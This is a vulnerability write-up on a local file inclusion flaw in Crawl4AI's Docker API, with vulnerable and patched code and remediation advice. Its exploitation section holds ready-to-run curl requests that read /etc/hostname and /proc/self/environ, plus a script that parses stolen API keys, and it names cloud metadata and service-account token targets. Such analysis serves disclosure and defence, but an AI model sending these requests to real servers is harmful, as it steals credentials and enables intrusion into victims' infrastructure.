Feb 17, 2026 · 6 min read
Crawl4AI exposed a headless browser via API without validating URL schemas. Attackers can use `file:///etc/passwd` or `file:///proc/self/environ` to read server files and steal API keys. Fixed in version 0.8.0.
A critical Local File Inclusion (LFI) vulnerability in Crawl4AI's Docker API allows unauthenticated attackers to abuse the `file://` protocol. By leveraging the headless browser intended for web scraping, attackers can read arbitrary files from the host filesystem, including sensitive environment variables and credentials.
In the gold rush of 2025, everyone needed data to feed their hungry Large Language Models. Enter Crawl4AI, a nifty tool designed to turn the chaotic web into clean, LLM-ready JSON. It’s a developer favorite because it abstracts away the nightmare of managing headless browsers like Chromium. You spin up a Docker container, send it a URL, and it politely hands back the content. Simple, right?
But here is the problem with abstraction: it hides the monsters. When you deploy Crawl4AI's Docker API, you are essentially exposing a full-featured web browser to the internet. Browsers are designed to be helpful. They want to render images, execute JavaScript, and—if you ask nicely—open local files.
CVE-2026-26217 is what happens when you hand a loaded browser to the public internet without checking the safety catch. It turns out that if you ask Crawl4AI to "crawl" its own hard drive using the file:// protocol, it won't just comply; it will take a screenshot, convert it to PDF, or extract the text and serve it up on a silver platter. It's not just a bug; it's an architectural oversight that turns a scraping tool into a file exfiltration cannon.
The vulnerability lies in a classic failure of input validation, specifically regarding Uniform Resource Identifier (URI) schemes. The Crawl4AI API endpoints—/execute_js, /screenshot, /pdf, and /html—accept a JSON payload containing a url parameter. The application logic takes this string and passes it directly to the underlying browser automation library (likely Playwright or Puppeteer).
Under normal circumstances, a browser should be able to open local files. If you double-click an HTML file on your desktop, Chrome opens it. That's a feature. However, in a server-side context, this feature becomes a critical vulnerability known as Local File Inclusion (LFI) or Server-Side Request Forgery (SSRF) with local access.
> [!NOTE]
> The Protocol Problem
> The root cause isn't that the code was complex; it's that it was too simple. It lacked an allowlist. It implicitly trusted that the user would only provide http:// or https:// URLs.
By supplying a URI like file:///etc/passwd, the attacker instructs the headless browser to navigate to the local file system. Because the browser process (running inside the container) has read permissions for standard system files, it renders the file content just as it would render a webpage. The API then packages this content into the response, completing the exfiltration loop.
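To see why the raw string is dangerous, consider how Python's standard `urlparse` (the same helper the eventual patch relies on) decomposes attacker-controlled URIs; a minimal sketch with illustrative inputs:

```python
from urllib.parse import urlparse

# Attacker-supplied "url" values and what a scheme check would see
for url in [
    "https://example.com/page",      # legitimate crawl target
    "file:///etc/passwd",            # local file read
    "file:///proc/self/environ",     # process environment variables
    "FILE:///etc/shadow",            # urlparse lowercases the scheme
]:
    parsed = urlparse(url)
    print(parsed.scheme, "->", parsed.path)
```

Navigating to any of the last three hands the browser direct filesystem access; the scheme, not the surface form of the string, is the reliable signal to filter on.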
Let's look at a reconstruction of the vulnerable logic versus the patched approach. The vulnerability exists because the URL is passed raw to the browser navigation method.
In the vulnerable versions (< 0.8.0), the handler for the /html endpoint looked something like this:
```python
@app.post("/html")
async def get_html(request: CrawlRequest):
    # ❌ FATAL ERROR: No validation of request.url
    # The browser blindly follows the file:// protocol
    await page.goto(request.url)
    content = await page.content()
    return {"html": content}
```

The patch introduces a strict protocol check. Before the URL touches the browser, it must pass a schema validation check.
```python
from urllib.parse import urlparse

@app.post("/html")
async def get_html(request: CrawlRequest):
    parsed = urlparse(request.url)
    # ✅ SECURITY FIX: Enforce HTTP/HTTPS
    if parsed.scheme not in ["http", "https"]:
        raise HTTPException(status_code=400, detail="Invalid protocol")
    await page.goto(request.url)
    content = await page.content()
    return {"html": content}
```

This simple check neutralizes the attack. If an attacker tries to pass file:///etc/shadow, the urlparse logic sees the scheme as file, the check fails, and the request is rejected before the browser is even invoked.
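The same check can be factored into a reusable guard that also covers a few edge cases. A sketch (the function name `validate_target_url` is mine, not Crawl4AI's API):

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def validate_target_url(url: str) -> bool:
    """Return True only for absolute http(s) URLs with a host."""
    parsed = urlparse(url)
    # urlparse lowercases the scheme, so "FILE://" cannot sneak past
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False
    # Reject host-less strings like "http:///etc/passwd"
    if not parsed.netloc:
        return False
    return True

assert validate_target_url("https://example.com") is True
assert validate_target_url("file:///etc/passwd") is False
assert validate_target_url("FILE:///etc/shadow") is False
assert validate_target_url("http:///etc/passwd") is False  # empty host
```

Checking the parsed scheme against an allowlist, rather than blocklisting `file://`, also shuts out other dangerous schemes a browser understands, such as `about:` or `chrome:`.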
Exploiting this vulnerability is trivial and requires no authentication in the default Docker configuration. We can use standard curl commands to extract data. The most dangerous vector here isn't necessarily /etc/passwd—it's the environment variables.
Since this tool is built for AI workflows, it is highly likely that the container environment contains API keys for OpenAI, Anthropic, or AWS credentials.
We check if the server is vulnerable by trying to read the /etc/hostname file, which is present in almost every Docker container.
```bash
curl -X POST http://target:8080/html \
  -H "Content-Type: application/json" \
  -d '{"url": "file:///etc/hostname"}'
```

If the server responds with the hostname, we escalate immediately to /proc/self/environ. This file contains the environment variables for the current process, separated by null bytes.
```bash
curl -X POST http://target:8080/execute_js \
  -H "Content-Type: application/json" \
  -d '{
    "url": "file:///proc/self/environ",
    "scripts": ["document.body.innerText"]
  }'
```

The Output:
Instead of a webpage, the attacker receives a JSON response containing strings like:
```
OPENAI_API_KEY=sk-proj-12345...\u0000AWS_ACCESS_KEY_ID=AKIA...
```
With these keys, the attacker can pivot from the simple scraper container to the victim's cloud infrastructure or drain their AI credits.
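The stolen blob is trivially machine-parsable. A sketch of how an attacker would split the null-delimited environ dump into key/value pairs (the values below are fabricated placeholders, not real credentials):

```python
# Simulated text extracted from file:///proc/self/environ
# (entries are NUL-separated; values are fabricated placeholders)
raw = "OPENAI_API_KEY=sk-proj-12345\x00AWS_ACCESS_KEY_ID=AKIA99999\x00PATH=/usr/bin"

secrets = {}
for entry in raw.split("\x00"):
    if "=" in entry:
        key, _, value = entry.partition("=")
        secrets[key] = value

print(secrets["OPENAI_API_KEY"])  # -> sk-proj-12345
```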
While CVSS 9.2 sounds high (and it is), the real impact depends on context. If Crawl4AI is running on a developer's laptop, the attacker reads their local files. If it's running in a Kubernetes cluster, the attacker reads the Service Account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.
The same flaw doubles as full Server-Side Request Forgery: an attacker can point the browser at http://localhost:80 or http://169.254.169.254 (cloud metadata services) to steal IAM roles. This is a "game over" vulnerability for the confidentiality of the container and potentially the hosting infrastructure.
The remediation is straightforward, but urgency is required. The exploit is public, simple, and scriptable.
1. Update Immediately:
Pull the latest Docker image. Version 0.8.0 and above contain the fix.

```bash
docker pull unclecode/crawl4ai:latest
```

2. Network Segmentation:
Even with the patch, a scraping tool should never have unfettered access to internal networks. Ensure the container has no egress access to internal subnets (10.0.0.0/8, 192.168.0.0/16) and block access to cloud metadata IPs (169.254.169.254).
3. Run with Least Privilege:
Do not run the container as root. While this doesn't stop the LFI of world-readable files, it prevents access to /etc/shadow or other root-owned sensitive data.
4. Authentication: The default Crawl4AI Docker setup does not enforce authentication. Put it behind a reverse proxy (Nginx, Traefik) that enforces Basic Auth or API key validation. Do not expose port 8080 to the public internet.
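Defense-in-depth for the network-segmentation step can also live in application code: before navigating, resolve the target host and refuse private, loopback, and link-local addresses. A minimal standard-library sketch (my own illustration, not part of the Crawl4AI patch):

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_destination(url: str) -> bool:
    """Reject URLs that resolve to private, loopback, or metadata IPs."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return False
    # Covers 10/8, 172.16/12, 192.168/16, 127/8, and 169.254/16 (metadata)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)

assert is_safe_destination("http://169.254.169.254/latest/meta-data/") is False
assert is_safe_destination("http://127.0.0.1:8080/") is False
```

Note that a single resolve-then-check is still bypassable via DNS rebinding; network-level egress filtering remains the stronger control.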
CVSS v3.1 Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Crawl4AI (unclecode) | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-22 (Path Traversal) |
| CVSS v4.0 | 9.2 (Critical) |
| CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N |
| Attack Vector | Network (API) |
| Exploit Status | PoC Available / Active |
| Impact | Information Disclosure (High) |
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.